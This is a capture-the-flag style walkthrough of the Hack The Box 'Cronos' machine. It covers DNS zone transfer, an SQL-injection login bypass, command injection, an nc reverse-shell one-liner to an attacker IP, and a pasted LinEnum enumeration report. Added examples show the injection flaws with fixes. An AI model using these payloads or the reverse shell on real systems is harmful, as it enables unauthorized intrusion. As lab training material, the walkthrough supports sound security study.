Linux Boxes

cronos

  1. nmap
  2. http
    1. vi /etc/hosts
  3. dns xfer (dig)
    1. www.cronos.htb
    2. ns1.cronos.htb
    3. admin.cronos.htb
  4. initial foothold
    1. sqlmap admin.cronos.htb
      1. login.req
      2. sqlmap -r login.req
    2. manual admin.cronos SQL injection
    3. command execution
      1. burp repeater
      2. pentest monkey reverse shell cheat sheet
        1. burp
        2. nc listener
      3. reverse shell
  5. Enumeration
    1. /dev/shm
      1. download LinEnum
      2. run LinEnum
        1. Report
      3. scheduled laravel owned by root
  6. priv esc with Kernel.php
    1. laravel scheduling task
      1. find app/Console/Kernel.php
      2. Kernel.php
    2. setuid.c
      1. CURL program to cronos
      2. update Kernel.php/ change owner of setuid.c to root
      3. move getuid.c to tmp folder & privesc
      4. root
  7. priv esc with artisan
    1. php-reverse-shell
  8. priv esc with kernel exploit dirty cow
  9. user/root
  10. lessons learned

cronos

images/362-1.png
images/362-2.png

nmap

images/363-1.png

Services Open
1) 22/tcp ssh <- can ssh into the box given credentials
2) 53/tcp dns <- likely going to need a zone transfer
3) 80/tcp http <- the box runs a web application we may be able to exploit

http

We get the default page when visiting the IP directly; check Burp Suite for a potential redirect

images/1961-1.png
images/1961-2.png


swap the IP address in the Host header for the host name cronos.htb
images/1961-3.png

Forward the packet and we are redirected to the real cronos web page, which means we should update our /etc/hosts file so that cronos.htb resolves to 10.10.10.13
images/1961-4.png

vi /etc/hosts

let's update our hosts file with vi
images/367-1.png

images/367-2.png

and now test navigating to cronos.htb
images/367-3.png

dns xfer (dig)

the dig zone transfer (AXFR) command usage is
dig axfr @<IP> <hostname>

A zone transfer succeeding for an arbitrary client means the name server (bind9 here) does not restrict allow-transfer; it hands out every record in the zone, which is how the extra host names below are found.

images/366-1.png


let's take these newly discovered domain names and add them to the /etc/hosts file
images/366-2.png

images/366-3.png

www.cronos.htb

images/368-1.png

ns1.cronos.htb

images/370-1.png

admin.cronos.htb

images/369-1.png

initial foothold

sqlmap admin.cronos.htb

To use sqlmap against the login form, we first need to capture a login request and pass it in as an argument

Capture sent login request with Burp Suite
images/365-1.png


images/365-2.png

login.req

copy this login request into the vi editor and save it as login.req
images/371-1.png
images/371-2.png

sqlmap -r login.req

images/372-1.png



images/372-2.png


Sqlmap gets a redirect to
admin.cronos.htb:80/welcome.php
images/372-3.png


images/372-4.png

sqlmap reported this while testing the username field for injection; let's try a manual SQL injection next...
images/372-5.png

manual admin.cronos SQL injection

Because the server does not sanitize (or parameterize) the input it places in its SQL query, a single quote ' terminates the string literal in a query along the lines of
SELECT * FROM Users WHERE UserName = 'username' ...
and -- - comments out the rest of the authentication query, including the password check,
bypassing authentication entirely. MySQL only treats -- as a comment when it is followed by whitespace, which is why the payload ends in -- - rather than a bare --.


images/373-1.png


voilà! we bypass authentication without a password
images/373-2.png
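The bypass just described, reproduced as an added example (not code from the page or from the Cronos application) against an in-memory SQLite table. The table, the credentials and the exact query shape are constructed for the example; the page only shows the UserName part of the real query. The vulnerable login concatenates the user's input into the SQL text, the fixed login binds it as a parameter, and the same payload is sent to both.

```python
import sqlite3

# Constructed sample data for the example: a single admin row in an in-memory
# SQLite table. Neither the table nor the credentials come from the Cronos box.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    db.execute("INSERT INTO Users VALUES ('admin', 'S3cretPassw0rd!')")
    return db

def login_vulnerable(db, username, password):
    """Builds the query by string concatenation, the way the page describes.

    The quote in the username closes the string literal and '-- -' comments
    out the rest of the WHERE clause, so the password is never compared.
    Returns the matched user name, or None when authentication fails.
    """
    sql = ("SELECT UserName FROM Users WHERE UserName = '%s' AND Password = '%s'"
           % (username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_fixed(db, username, password):
    """Same query with bound parameters: the quote stays data, not SQL syntax."""
    sql = "SELECT UserName FROM Users WHERE UserName = ? AND Password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    payload = "admin' -- -"   # same shape as the bypass used on the box
    print("vulnerable:", login_vulnerable(db, payload, "wrong"))   # admin
    print("fixed:     ", login_fixed(db, payload, "wrong"))         # None
```

SQLite accepts a bare `--` as a comment, MySQL needs the trailing whitespace, so `-- -` works against both. The parameterized version rejects the payload because the whole string, quote included, is compared against the UserName column.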

command execution

By appending a command after a ; character we see that the server executes it: the form's input is handed to a shell without sanitization, which is OS command injection

images/374-1.png

images/374-2.png

images/374-3.png

burp repeater

Remember: in Burp Repeater the command must be URL-encoded before sending (select it and press Ctrl-U)

images/376-1.png

Can do RCE through command as well:
images/376-2.png
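The injection above in miniature, as an added example that is not code from the page or from the Cronos application. `echo` stands in for the network tool behind the form so the code runs offline; the payload shape (`target; command`) is the same as the one used against the box. The vulnerable version concatenates the value into a shell command line; the fixed version allow-lists the value and passes it as its own argv element with no shell. The host name regex and the `tracing` output are constructed for the example.

```python
import re
import subprocess

# "echo" stands in for the ping/traceroute-style tool behind the web form, so
# the example runs offline; the injection mechanics are identical.
TOOL = ["echo", "tracing"]

# Allow-list for a host name or dotted IPv4 address (constructed for the example).
# It also rejects a leading '-', so a value cannot be parsed by the tool as an option.
HOST_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

def trace_vulnerable(host):
    """Concatenates the user value into a shell command line (the flaw on the box).

    ';' terminates the intended command and whatever follows runs as the
    web server user. Returns the captured stdout.
    """
    cmd = " ".join(TOOL) + " " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def trace_argv_only(host):
    """No shell, but no allow-list either: ';' becomes literal text in one
    argument, yet a value starting with '-' could still reach the tool as an option."""
    return subprocess.run(TOOL + [host], capture_output=True, text=True).stdout

def trace_fixed(host):
    """Allow-lists the value, then passes it as its own argv element with no shell."""
    if not HOST_RE.match(host):
        raise ValueError("invalid host: %r" % host)
    return subprocess.run(TOOL + [host], capture_output=True, text=True).stdout

if __name__ == "__main__":
    payload = "8.8.8.8; echo INJECTED"
    print(trace_vulnerable(payload), end="")   # tracing 8.8.8.8 / INJECTED
    print(trace_argv_only(payload), end="")    # tracing 8.8.8.8; echo INJECTED
    try:
        trace_fixed(payload)
    except ValueError as e:
        print(e)
```

Two layers are deliberate: dropping the shell makes `;`, `|`, `$(...)` and backticks inert, and the allow-list stops option injection (a value such as `-c 100000`) that an argv list alone would still pass through.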

pentest monkey reverse shell cheat sheet

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.62 1234 >/tmp/f

images/377-1.png

burp

Pre URL-ENCODE

images/378-1.png

Post URL-ENCODE:
images/378-2.png

nc listener

images/379-1.png

reverse shell

images/375-1.png

upgrade to a tty shell with python:

python -c 'import pty;pty.spawn("/bin/bash")'
images/375-2.png

For tab auto-completion in the shell:
Ctrl+Z to background the shell
stty raw -echo
fg (foreground)

images/375-3.png
type "fg" after stty and press the enter key a couple of times

to get clear-screen capabilities, export TERM=screen
images/375-4.png


Enumeration

Next, have the target download our enumeration scripts to check for potential vulnerabilities...

images/382-1.png


images/382-2.png

/dev/shm

/dev/shm is a tmpfs, so its contents disappear on reboot; that makes it a convenient place to drop attack/enumeration tools (note it is normally mounted nosuid, so SUID binaries placed there do not elevate)
images/383-1.png

download LinEnum

images/384-1.png

run LinEnum

images/381-1.png

the first 4 cron jobs are standard; the 5th, however, is not common on Linux boxes and is worth looking into

images/381-2.png

Report

-rw-r--r-- 1 root root 907 Jan 19 2017 systemd-resolved.service
-rw-r--r-- 1 root root 696 Jan 19 2017 systemd-rfkill.service
-rw-r--r-- 1 root root 497 Jan 19 2017 systemd-suspend.service
-rw-r--r-- 1 root root 649 Jan 19 2017 systemd-sysctl.service
-rw-r--r-- 1 root root 655 Jan 19 2017 systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Jan 19 2017 systemd-timesyncd.service
-rw-r--r-- 1 root root 598 Jan 19 2017 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root 703 Jan 19 2017 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root 683 Jan 19 2017 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root 823 Jan 19 2017 systemd-udev-settle.service
-rw-r--r-- 1 root root 743 Jan 19 2017 systemd-udev-trigger.service
-rw-r--r-- 1 root root 825 Jan 19 2017 systemd-udevd.service
-rw-r--r-- 1 root root 757 Jan 19 2017 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root 754 Jan 19 2017 systemd-update-utmp.service
-rw-r--r-- 1 root root 573 Jan 19 2017 systemd-user-sessions.service
-rw-r--r-- 1 root root 528 Jan 19 2017 user@.service
-rw-r--r-- 1 root root 403 Jan 19 2017 -.slice
-rw-r--r-- 1 root root 879 Jan 19 2017 basic.target
-rw-r--r-- 1 root root 379 Jan 19 2017 bluetooth.target
-rw-r--r-- 1 root root 358 Jan 19 2017 busnames.target
-rw-r--r-- 1 root root 394 Jan 19 2017 cryptsetup-pre.target
-rw-r--r-- 1 root root 366 Jan 19 2017 cryptsetup.target
-rw-r--r-- 1 root root 670 Jan 19 2017 dev-hugepages.mount
-rw-r--r-- 1 root root 624 Jan 19 2017 dev-mqueue.mount
-rw-r--r-- 1 root root 431 Jan 19 2017 emergency.target
-rw-r--r-- 1 root root 501 Jan 19 2017 exit.target
-rw-r--r-- 1 root root 440 Jan 19 2017 final.target
-rw-r--r-- 1 root root 460 Jan 19 2017 getty.target
-rw-r--r-- 1 root root 558 Jan 19 2017 graphical.target
-rw-r--r-- 1 root root 487 Jan 19 2017 halt.target
-rw-r--r-- 1 root root 447 Jan 19 2017 hibernate.target
-rw-r--r-- 1 root root 468 Jan 19 2017 hybrid-sleep.target
-rw-r--r-- 1 root root 553 Jan 19 2017 initrd-fs.target
-rw-r--r-- 1 root root 526 Jan 19 2017 initrd-root-fs.target
-rw-r--r-- 1 root root 691 Jan 19 2017 initrd-switch-root.target
-rw-r--r-- 1 root root 671 Jan 19 2017 initrd.target
-rw-r--r-- 1 root root 501 Jan 19 2017 kexec.target
-rw-r--r-- 1 root root 395 Jan 19 2017 local-fs-pre.target
-rw-r--r-- 1 root root 507 Jan 19 2017 local-fs.target
-rw-r--r-- 1 root root 405 Jan 19 2017 machine.slice
-rw-r--r-- 1 root root 492 Jan 19 2017 multi-user.target
-rw-r--r-- 1 root root 464 Jan 19 2017 network-online.target
-rw-r--r-- 1 root root 461 Jan 19 2017 network-pre.target
-rw-r--r-- 1 root root 480 Jan 19 2017 network.target
-rw-r--r-- 1 root root 514 Jan 19 2017 nss-lookup.target
-rw-r--r-- 1 root root 473 Jan 19 2017 nss-user-lookup.target
-rw-r--r-- 1 root root 354 Jan 19 2017 paths.target
-rw-r--r-- 1 root root 552 Jan 19 2017 poweroff.target
-rw-r--r-- 1 root root 377 Jan 19 2017 printer.target
-rw-r--r-- 1 root root 693 Jan 19 2017 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root 603 Jan 19 2017 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root 543 Jan 19 2017 reboot.target
-rw-r--r-- 1 root root 396 Jan 19 2017 remote-fs-pre.target
-rw-r--r-- 1 root root 482 Jan 19 2017 remote-fs.target
-rw-r--r-- 1 root root 486 Jan 19 2017 rescue.target
-rw-r--r-- 1 root root 500 Jan 19 2017 rpcbind.target
-rw-r--r-- 1 root root 402 Jan 19 2017 shutdown.target
-rw-r--r-- 1 root root 362 Jan 19 2017 sigpwr.target
-rw-r--r-- 1 root root 420 Jan 19 2017 sleep.target
-rw-r--r-- 1 root root 409 Jan 19 2017 slices.target
-rw-r--r-- 1 root root 380 Jan 19 2017 smartcard.target
-rw-r--r-- 1 root root 356 Jan 19 2017 sockets.target
-rw-r--r-- 1 root root 380 Jan 19 2017 sound.target
-rw-r--r-- 1 root root 441 Jan 19 2017 suspend.target
-rw-r--r-- 1 root root 353 Jan 19 2017 swap.target
-rw-r--r-- 1 root root 715 Jan 19 2017 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root 719 Jan 19 2017 sys-kernel-config.mount
-rw-r--r-- 1 root root 662 Jan 19 2017 sys-kernel-debug.mount
-rw-r--r-- 1 root root 518 Jan 19 2017 sysinit.target
-rw-r--r-- 1 root root 1.3K Jan 19 2017 syslog.socket
-rw-r--r-- 1 root root 585 Jan 19 2017 system-update.target
-rw-r--r-- 1 root root 436 Jan 19 2017 system.slice
-rw-r--r-- 1 root root 646 Jan 19 2017 systemd-ask-password-console.path
-rw-r--r-- 1 root root 574 Jan 19 2017 systemd-ask-password-wall.path
-rw-r--r-- 1 root root 409 Jan 19 2017 systemd-bus-proxyd.socket
-rw-r--r-- 1 root root 540 Jan 19 2017 systemd-fsckd.socket
-rw-r--r-- 1 root root 524 Jan 19 2017 systemd-initctl.socket
-rw-r--r-- 1 root root 607 Jan 19 2017 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.1K Jan 19 2017 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root 842 Jan 19 2017 systemd-journald.socket
-rw-r--r-- 1 root root 591 Jan 19 2017 systemd-networkd.socket
-rw-r--r-- 1 root root 617 Jan 19 2017 systemd-rfkill.socket
-rw-r--r-- 1 root root 450 Jan 19 2017 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root 578 Jan 19 2017 systemd-udevd-control.socket
-rw-r--r-- 1 root root 570 Jan 19 2017 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root 395 Jan 19 2017 time-sync.target
-rw-r--r-- 1 root root 405 Jan 19 2017 timers.target
-rw-r--r-- 1 root root 417 Jan 19 2017 umount.target
-rw-r--r-- 1 root root 392 Jan 19 2017 user.slice
-rw-r--r-- 1 root root 663 Jan 18 2017 systemd-networkd-resolvconf-update.service
-rw-r--r-- 1 root root 153 Jan 17 2017 apt-daily.service
-rw-r--r-- 1 root root 162 Jan 17 2017 apt-daily.timer
-rw-r--r-- 1 root root 342 Jan 13 2017 getty-static.service
-rw-r--r-- 1 root root 153 Jan 13 2017 sigpwr-container-shutdown.service
-rw-r--r-- 1 root root 152 Jan 13 2017 systemd-networkd-resolvconf-update.path
-rw-r--r-- 1 root root 491 Jan 12 2017 dbus.service
-rw-r--r-- 1 root root 106 Jan 12 2017 dbus.socket
-rw-r--r-- 1 root root 189 Dec 16 2016 uuidd.service
-rw-r--r-- 1 root root 126 Dec 16 2016 uuidd.socket
-rw-r--r-- 1 root root 320 Dec 14 2016 unattended-upgrades.service
-rw-r--r-- 1 root root 420 Dec 7 2016 resolvconf.service
-rw-r--r-- 1 root root 735 Nov 30 2016 networking.service
-rw-r--r-- 1 root root 497 Nov 30 2016 ifup@.service
-rw-r--r-- 1 root root 359 Nov 15 2016 bind9-resolvconf.service
-rw-r--r-- 1 root root 239 Nov 15 2016 bind9.service
-rw-r--r-- 1 root root 350 Nov 15 2016 bind9-pkcs11.service
-rw-r--r-- 1 root root 631 Nov 3 2016 accounts-daemon.service
-rw-r--r-- 1 root root 251 Sep 18 2016 open-vm-tools.service
-rw-r--r-- 1 root root 285 Jun 16 2016 keyboard-setup.service
-rw-r--r-- 1 root root 288 Jun 16 2016 console-setup.service
lrwxrwxrwx 1 root root 27 May 10 2016 plymouth-log.service -> plymouth-read-write.service
lrwxrwxrwx 1 root root 21 May 10 2016 plymouth.service -> plymouth-quit.service
-rw-r--r-- 1 root root 412 May 10 2016 plymouth-halt.service
-rw-r--r-- 1 root root 426 May 10 2016 plymouth-kexec.service
-rw-r--r-- 1 root root 421 May 10 2016 plymouth-poweroff.service
-rw-r--r-- 1 root root 200 May 10 2016 plymouth-quit-wait.service
-rw-r--r-- 1 root root 194 May 10 2016 plymouth-quit.service
-rw-r--r-- 1 root root 244 May 10 2016 plymouth-read-write.service
-rw-r--r-- 1 root root 416 May 10 2016 plymouth-reboot.service
-rw-r--r-- 1 root root 532 May 10 2016 plymouth-start.service
-rw-r--r-- 1 root root 291 May 10 2016 plymouth-switch-root.service
-rw-r--r-- 1 root root 490 May 10 2016 systemd-ask-password-plymouth.path
-rw-r--r-- 1 root root 467 May 10 2016 systemd-ask-password-plymouth.service
-rw-r--r-- 1 root root 385 Apr 28 2016 ssh.service
-rw-r--r-- 1 root root 216 Apr 28 2016 ssh.socket
-rw-r--r-- 1 root root 196 Apr 28 2016 ssh@.service
lrwxrwxrwx 1 root root 9 Apr 16 2016 lvm2.service -> /dev/null
-rw-r--r-- 1 root root 334 Apr 16 2016 dm-event.service
-rw-r--r-- 1 root root 248 Apr 16 2016 dm-event.socket
-rw-r--r-- 1 root root 380 Apr 16 2016 lvm2-lvmetad.service
-rw-r--r-- 1 root root 215 Apr 16 2016 lvm2-lvmetad.socket
-rw-r--r-- 1 root root 335 Apr 16 2016 lvm2-lvmpolld.service
-rw-r--r-- 1 root root 213 Apr 16 2016 lvm2-lvmpolld.socket
-rw-r--r-- 1 root root 658 Apr 16 2016 lvm2-monitor.service
-rw-r--r-- 1 root root 382 Apr 16 2016 lvm2-pvscan@.service
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel5.target.wants
-rw-r--r-- 1 root root 234 Apr 9 2016 acpid.service
-rw-r--r-- 1 root root 251 Apr 6 2016 cron.service
-rw-r--r-- 1 root root 290 Apr 5 2016 rsyslog.service
-rw-r--r-- 1 root root 225 Mar 31 2016 apport-forward.socket
-rw-r--r-- 1 root root 142 Mar 31 2016 apport-forward@.service
-rw-r--r-- 1 root root 455 Mar 29 2016 iscsid.service
-rw-r--r-- 1 root root 1.1K Mar 29 2016 open-iscsi.service
-rw-r--r-- 1 root root 115 Feb 10 2016 acpid.socket
-rw-r--r-- 1 root root 115 Feb 9 2016 acpid.path
-rw-r--r-- 1 root root 169 Jan 15 2016 atd.service
-rw-r--r-- 1 root root 182 Jan 14 2016 polkitd.service
-rw-r--r-- 1 root root 790 Jun 1 2015 friendly-recovery.service
-rw-r--r-- 1 root root 241 Mar 3 2015 ufw.service
-rw-r--r-- 1 root root 250 Feb 24 2015 ureadahead-stop.service
-rw-r--r-- 1 root root 242 Feb 24 2015 ureadahead-stop.timer
-rw-r--r-- 1 root root 401 Feb 24 2015 ureadahead.service
-rw-r--r-- 1 root root 188 Feb 24 2014 rsync.service

/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 May 10 2016 plymouth-halt.service -> ../plymouth-halt.service

/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 May 10 2016 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 May 10 2016 plymouth-switch-root.service -> ../plymouth-switch-root.service

/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 May 10 2016 plymouth-kexec.service -> ../plymouth-kexec.service

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Mar 22 2017 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Mar 22 2017 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Mar 22 2017 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Mar 22 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Mar 22 2017 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Jan 12 2017 dbus.service -> ../dbus.service
lrwxrwxrwx 1 root root 29 May 10 2016 plymouth-quit-wait.service -> ../plymouth-quit-wait.service
lrwxrwxrwx 1 root root 24 May 10 2016 plymouth-quit.service -> ../plymouth-quit.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Mar 22 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 28 May 10 2016 plymouth-poweroff.service -> ../plymouth-poweroff.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Mar 22 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 26 May 10 2016 plymouth-reboot.service -> ../plymouth-reboot.service

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Mar 22 2017 console-setup.service -> ../console-setup.service
lrwxrwxrwx 1 root root 20 Mar 22 2017 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Mar 22 2017 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Mar 22 2017 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 25 Mar 22 2017 keyboard-setup.service -> ../keyboard-setup.service
lrwxrwxrwx 1 root root 28 Mar 22 2017 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Mar 22 2017 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 19 Mar 22 2017 setvtrgb.service -> ../setvtrgb.service
lrwxrwxrwx 1 root root 32 Mar 22 2017 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Mar 22 2017 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Mar 22 2017 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Mar 22 2017 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Mar 22 2017 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 Mar 22 2017 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 32 Mar 22 2017 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 27 Mar 22 2017 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 36 Mar 22 2017 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Mar 22 2017 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Mar 22 2017 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Mar 22 2017 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Mar 22 2017 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Mar 22 2017 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 31 Mar 22 2017 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 24 Mar 22 2017 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 30 Mar 22 2017 systemd-update-utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 30 May 10 2016 plymouth-read-write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 May 10 2016 plymouth-start.service -> ../plymouth-start.service

/lib/systemd/system/apache2.service.d:
total 4.0K
-rw-r--r-- 1 root root 42 Apr 12 2016 apache2-systemd.conf

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 30 Mar 22 2017 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 25 Mar 22 2017 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Mar 22 2017 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Mar 22 2017 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Mar 22 2017 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Mar 22 2017 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 14 Jan 12 2017 dbus.socket -> ../dbus.socket

/lib/systemd/system/systemd-timesyncd.service.d:
total 4.0K
-rw-r--r-- 1 root root 251 Jan 12 2017 disable-with-time-daemon.conf

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Mar 22 2017 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Jan 12 2017 debian.conf

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Mar 22 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/resolvconf.service.wants:
total 0
lrwxrwxrwx 1 root root 42 Mar 22 2017 systemd-networkd-resolvconf-update.path -> ../systemd-networkd-resolvconf-update.path

/lib/systemd/system/sigpwr.target.wants:
total 0
lrwxrwxrwx 1 root root 36 Mar 22 2017 sigpwr-container-shutdown.service -> ../sigpwr-container-shutdown.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Mar 22 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Mar 22 2017 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Mar 22 2017 getty-static.service -> ../getty-static.service

/lib/systemd/system/busnames.target.wants:
total 0

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/system-sleep:
total 4.0K
-rwxr-xr-x 1 root root 92 Mar 17 2016 hdparm

/lib/systemd/system-generators:
total 680K
-rwxr-xr-x 1 root root 59K Jan 19 2017 systemd-dbus1-generator
-rwxr-xr-x 1 root root 71K Jan 19 2017 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root 43K Jan 19 2017 systemd-debug-generator
-rwxr-xr-x 1 root root 79K Jan 19 2017 systemd-fstab-generator
-rwxr-xr-x 1 root root 39K Jan 19 2017 systemd-getty-generator
-rwxr-xr-x 1 root root 119K Jan 19 2017 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root 39K Jan 19 2017 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root 39K Jan 19 2017 systemd-insserv-generator
-rwxr-xr-x 1 root root 35K Jan 19 2017 systemd-rc-local-generator
-rwxr-xr-x 1 root root 31K Jan 19 2017 systemd-system-update-generator
-rwxr-xr-x 1 root root 103K Jan 19 2017 systemd-sysv-generator
-rwxr-xr-x 1 root root 11K Apr 16 2016 lvm2-activation-generator

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 869 Jan 19 2017 90-systemd.preset

/lib/systemd/network:
total 12K
-rw-r--r-- 1 root root 404 Jan 19 2017 80-container-host0.network
-rw-r--r-- 1 root root 482 Jan 19 2017 80-container-ve.network
-rw-r--r-- 1 root root 80 Jan 19 2017 99-default.link

/lib/systemd/system-shutdown:
total 0


### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.16


[-] MYSQL version:
mysql Ver 14.14 Distrib 5.7.17, for Linux (x86_64) using EditLine wrapper


[-] Apache version:
Server version: Apache/2.4.18 (Ubuntu)
Server built: 2016-07-14T12:32:26


[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


[-] Installed Apache modules:
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
setenvif_module (shared)
status_module (shared)


### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/curl


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1667 Apr 9 2017 /etc/passwd
-rw-r--r-- 1 root root 832 Apr 9 2017 /etc/group
-rw-r--r-- 1 root root 575 Oct 22 2015 /etc/profile
-rw-r----- 1 root shadow 1191 Apr 9 2017 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Dec 16 2016 /bin/umount
-rwsr-xr-x 1 root root 40152 Dec 16 2016 /bin/mount
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40128 Mar 29 2016 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
